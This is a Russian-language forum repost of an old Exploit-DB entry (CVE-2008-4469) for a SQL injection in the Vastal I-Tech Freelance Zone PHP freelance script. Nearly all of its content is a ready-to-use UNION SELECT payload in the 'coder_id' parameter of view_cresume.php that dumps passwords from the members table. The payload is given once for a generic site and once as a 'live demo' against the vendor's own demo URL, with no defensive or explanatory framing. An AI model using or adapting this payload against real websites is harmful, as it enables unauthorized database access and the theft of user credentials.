Exploit Vastal I-Tech Freelance Zone - 'coder_id' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
6381
Проверка EDB
  1. Пройдено
Автор
STACK
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-4469
Дата публикации
2008-09-05
Код:
#######################################################
#  Vastal I-Tech Freelance Zone SQL Injection Vulnerability
#
# Author   : Stack
#
#
# Script Home Page : http://www.vastal.com/freelance-zone-freelance-auction-script.html
#
# Demo      : http://www.vastal.com/freelance/
#######################################################
the exploit fate the password
use ur mind for have the column username
Exploit:
http://site.il/view_cresume.php?coder_id=-1/**/UNION/**/SELECT/**/1,2,password,user(),5/**/from/**/members/*
Live Demo
http://www.vastal.com/freelance/view_cresume.php?coder_id=-1/**/UNION/**/SELECT/**/1,2,password,user(),5/**/from/**/members/*

# milw0rm.com [2008-09-05]
 
Источник
www.exploit-db.com

Похожие темы